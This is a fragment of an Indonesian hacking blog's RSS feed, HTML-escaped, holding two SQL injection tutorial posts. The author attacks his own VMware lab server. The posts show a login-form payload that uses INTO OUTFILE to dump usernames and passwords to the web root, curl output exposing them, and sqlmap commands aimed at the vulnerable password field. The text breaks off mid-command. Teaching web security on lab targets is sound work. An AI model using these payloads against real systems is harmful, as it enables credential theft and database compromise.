/&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;5. Dumping Username + Password With Burpsuite&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Melakukan dumping username dan password belum pernah secepat dan semudah ini. Biasanya anda harus mencari table dan kolom yang tepat untuk mendapatkan username dan password. Namun kali ini anda hanya membutuhkan satu perintah saja. Ubah bagian:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: lime;"&gt;myusername=admin&amp;amp;mypassword='&amp;amp;Submit=Login&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Menjadi&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: lime;"&gt;myusername=admin&amp;amp;mypassword=&lt;/span&gt;&lt;span style="color: red;"&gt;' OR 1=1 INTO OUTFILE '/var/www/dump' -- &lt;/span&gt;&lt;span style="color: lime;"&gt;&amp;amp;Submit=Login&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: lime;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Jangan klik tombol GO. Untuk membuktikan bahwa username dan password berhasil di dump ke /var/www/dump, kita akan menguji keberadaan file dump pada server dengan perintah curl.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: white; font-family: Monaco, Consolas, Courier, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;red-dragon&amp;nbsp;&lt;/span&gt;[~]&lt;span style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: yellow;"&gt;&amp;gt;&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; font-size: medium;"&gt;&lt;b&gt;curl http://172.16.33.131/dump&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Maka akan muncul&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: white; font-family: Monaco, Consolas, Courier, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;red-dragon&amp;nbsp;&lt;/span&gt;[~]&lt;span style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: yellow;"&gt;&amp;gt;&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; font-size: medium;"&gt;&lt;b&gt;curl http://172.16.33.131/dump&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace; font-size: medium;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&amp;lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&amp;gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime;"&gt;&amp;lt;title&amp;gt;&lt;/span&gt;&lt;span style="color: red;"&gt;404 Not Found&lt;/span&gt;&lt;span style="color: lime;"&gt;&amp;lt;/title&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&amp;lt;h1&amp;gt;Not Found&amp;lt;/h1&amp;gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime;"&gt;&amp;lt;p&amp;gt;&lt;/span&gt;&lt;span style="color: red;"&gt;The requested URL /dump was not found on this server&lt;/span&gt;&lt;span style="color: lime;"&gt;.&amp;lt;/p&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&amp;lt;hr&amp;gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&amp;lt;address&amp;gt;Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch Server at 172.16.33.131 Port 80&amp;lt;/address&amp;gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;/code&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-7ByAOHWxykU/T4Yl7P2ntrI/AAAAAAAABUQ/yZw4wKOodDs/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="168" src="http://4.bp.blogspot.com/-7ByAOHWxykU/T4Yl7P2ntrI/AAAAAAAABUQ/yZw4wKOodDs/s320/6.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Terlihat bahwa file dump memang tidak ada (belum ada). Kemudian klik tombol go pada burpsuite. Dan lakukan pengecekan lagi dengan curl.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: white; font-family: Monaco, Consolas, Courier, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;red-dragon&amp;nbsp;&lt;/span&gt;[~]&lt;span style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: yellow;"&gt;&amp;gt;&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; font-size: medium;"&gt;&lt;b&gt;curl http://172.16.33.131/dump&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace; font-size: medium;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime;"&gt;1&lt;/span&gt;&lt;span class="Apple-tab-span" style="color: lime; white-space: pre;"&gt; &lt;/span&gt;&lt;span style="color: red;"&gt;john&lt;/span&gt;&lt;span class="Apple-tab-span" style="color: lime; white-space: pre;"&gt; &lt;/span&gt;&lt;span style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="color: red;"&gt;MyNameIsJohn&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime;"&gt;2&lt;/span&gt;&lt;span class="Apple-tab-span" style="color: lime; white-space: pre;"&gt; &lt;/span&gt;&lt;span style="color: red;"&gt;robert &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-tab-span" style="color: lime; white-space: pre;"&gt; &lt;/span&gt;&lt;span style="color: red;"&gt;ADGAdsafdfwt4gadfga==&lt;/span&gt;&lt;/code&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-8Cdp-003Oho/T4YnsYlko_I/AAAAAAAABUY/oOW5eMLD2sg/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="168" src="http://1.bp.blogspot.com/-8Cdp-003Oho/T4YnsYlko_I/AAAAAAAABUY/oOW5eMLD2sg/s320/7.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;It's easy, isn't?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;created by : &lt;span style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-548681607815599306?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/04/sql-injection-level-4-part-2.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-rj9UsfCYujI/T4YftIo0UYI/AAAAAAAABSo/aXuC-bxVGzQ/s72-c/1.png' height='72' width='72'/><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-7544942465614747891</guid><pubDate>Tue, 10 Apr 2012 05:38:00 +0000</pubDate><atom:updated>2012-04-10T12:40:56.041+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>SQL Injection</category><category domain='http://www.blogger.com/atom/ns#'>Tamper Data</category><category domain='http://www.blogger.com/atom/ns#'>SQLmap</category><title>SQL Injection Level 4 [Part 1]</title><description>Bosan dengan perintah&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;(select group_concat(table_name) from information schema.tables where table_schema=database())&lt;/b&gt;&lt;br /&gt;&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kali ini saya akan memberikan sedikit pelajaran mengenai SQL Injection level 4. Pada tutorial kali ini, saya tidak menggunakan live target, karena saya rasa itu bersifat merusak. Sehingga saya coba metode ini di localhost dengan bantuan VMware.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Preparation :&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;Firefox&lt;/li&gt;&lt;li&gt;Tamper Data (add ons mozilla firefox)&lt;/li&gt;&lt;li&gt;SQLmap&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;Walkthrough&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;1. Menguji vulnerability.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kali ini, vmware saya telah berjalan dan memiliki ip address&amp;nbsp;172.16.33.131. Saya buka firefox, kemudian saya masukan IP address&amp;nbsp;172.16.33.131 pada address bar.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-ldZk1SKKDXU/T4PBED_g47I/AAAAAAAABRg/S6a6PI0as7s/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="229" src="http://4.bp.blogspot.com/-ldZk1SKKDXU/T4PBED_g47I/AAAAAAAABRg/S6a6PI0as7s/s320/1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Username : admin&lt;/div&gt;&lt;div&gt;Password : admin&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Log In... Kemudian...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-0OK9YsTXKKU/T4PBR8fTtjI/AAAAAAAABRo/EhzIol4Fh44/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="229" src="http://1.bp.blogspot.com/-0OK9YsTXKKU/T4PBR8fTtjI/AAAAAAAABRo/EhzIol4Fh44/s320/2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kita berada di halaman checklogin.php. Disini tidak ada parameter untuk diuji. Mungkin saya bisa menguji data yang dikirim ke server. Saya kembali lagi ke halaman login.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Username : admin&lt;/div&gt;&lt;div&gt;Password : '&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Log In.. Kemudian...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-XFKdyknArlo/T4PBsp7yzxI/AAAAAAAABRw/-K5zGllDreU/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="229" src="http://3.bp.blogspot.com/-XFKdyknArlo/T4PBsp7yzxI/AAAAAAAABRw/-K5zGllDreU/s320/3.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kelihatannya website ini vulnerable. Namun tetap tidak ada parameter. Sehingga dapat disimpulkan bahwa vulnerability bukan terletak pada parameter, melainkan DATA. Untuk mengecek data yang dikirim ke server, saya gunakan tamper data.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;2. Tamper Data In Action&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Jika anda belum memiliki tamper data, anda bisa install di&amp;nbsp;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/tamper-data/" target="_blank"&gt;sini&lt;/a&gt;. Namun add-on ini hanya dapat digunakan di Mozilla Firefox. Dan tidak dapat digunakan di Browser lain.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Setelah menginstall, tamper data dapat diaktifkan di Tools - Tamper Data&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-ljo6pEeHdF8/T4PCh-vcntI/AAAAAAAABR4/aM2QQFmSRkU/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="221" src="http://2.bp.blogspot.com/-ljo6pEeHdF8/T4PCh-vcntI/AAAAAAAABR4/aM2QQFmSRkU/s320/4.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kembali ke halaman login&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Username : admin&lt;/div&gt;&lt;div&gt;Password : 123&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Maka tamper data akan mengambil setiap data yang terjadi selama proses transfer data dari client ke server, maupun sebaliknya.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-K-fxT9uwJwg/T4PDAgE5IMI/AAAAAAAABSA/UNVQS3QRFl0/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://1.bp.blogspot.com/-K-fxT9uwJwg/T4PDAgE5IMI/AAAAAAAABSA/UNVQS3QRFl0/s320/5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;OK. Saya temukan&lt;b&gt;&amp;nbsp;POSTDATA=myusername=admin&amp;amp;mypassword=123&amp;amp;Submit=Login&lt;/b&gt;. Ternyata ada 3 data di sini. yaitu myusername, mypassword, dan Submit. Dan kita telah mengetahui bahwa data password vulnerable. Selanjutnya kita akan gunakan SQLmap untuk menguji database menggunakan informasi yang telah kita dapatkan. Sebelumnya saya ucapkan terima kasih pada tamper data. =)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;3. SQLmap in Attack&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;red-dragon &lt;/span&gt;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;span style="color: red;"&gt; &lt;/span&gt;&lt;span style="color: yellow;"&gt;&amp;gt;&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;cd /pentest/database/sqlmap/&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;red-dragon&amp;nbsp;&lt;/span&gt;&lt;span style="color: white;"&gt;[&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: white; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;/pentest/database/sqlmap&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: white;"&gt;]&lt;/span&gt;&lt;span style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: yellow;"&gt;&amp;gt;&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;python sqlmap.py -u http://172.16.33.131/checklogin.php --data="POSTDATA=myusername=admin&amp;amp;mypassword=123&amp;amp;Submit=Login" -p mypassword --flush-session&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Keterangan:&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;-u = url [Pesan error muncul pada halaman checklogin.php]&lt;/li&gt;&lt;li&gt;--data = [Kali ini kita akan memberikan data pada server dengan cara tampering / menyuap]&lt;/li&gt;&lt;li&gt;-p = parameter [Parameter yang vulnerable adalah mypassword&lt;/li&gt;&lt;li&gt;--flush-session = Bagian ini tidak masalah jika tidak disertakan.&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-viAH9Ar0ubs/T4PEsQezu6I/AAAAAAAABSI/gi5rMxtKRqQ/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="166" src="http://1.bp.blogspot.com/-viAH9Ar0ubs/T4PEsQezu6I/AAAAAAAABSI/gi5rMxtKRqQ/s320/6.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Muncul pertanyaan:&lt;/div&gt;&lt;div&gt;parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n]&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Saya tekan "n" [tanpa tanda kutip], kemudian "enter"&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kemudian muncul lagi:&lt;/div&gt;&lt;div&gt;sqlmap got a 302 redirect to 'http://172.16.33.131:80/login_success.php'. Do you want to follow? [Y/n]&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Saya tekan "n" [tanpa tanda kutip], kemudian "enter"&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;dan berujung pada CRITICAL:&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="color: red;"&gt;[CRITICAL]&lt;/span&gt;&lt;/b&gt; all parameters appear to be not injectable.&lt;b&gt; &lt;span style="color: lime;"&gt;Try to increase --level/--risk&lt;/span&gt;&lt;/b&gt; values to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. Please, consider usage of tampering scripts as your target might filter the queries. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-zgP9iMJp8jQ/T4PGS0ypzkI/AAAAAAAABSQ/jq-whZmieQM/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="166" src="http://1.bp.blogspot.com/-zgP9iMJp8jQ/T4PGS0ypzkI/AAAAAAAABSQ/jq-whZmieQM/s320/7.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;4. Game Over&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Saya coba naikan level dan risk pada testing SQLmap menjadi 5.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;red-dragon&amp;nbsp;&lt;/span&gt;&lt;span style="color: white;"&gt;[&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: white; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;/pentest/database/sqlmap&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: white;"&gt;]&lt;/span&gt;&lt;span style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: yellow;"&gt;&amp;gt;&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;python sqlmap.py -u http://172.16.33.131/checklogin.php --data="POSTDATA=myusername=admin&amp;amp;mypassword=123&amp;amp;Submit=Login" -p mypassword --level=5 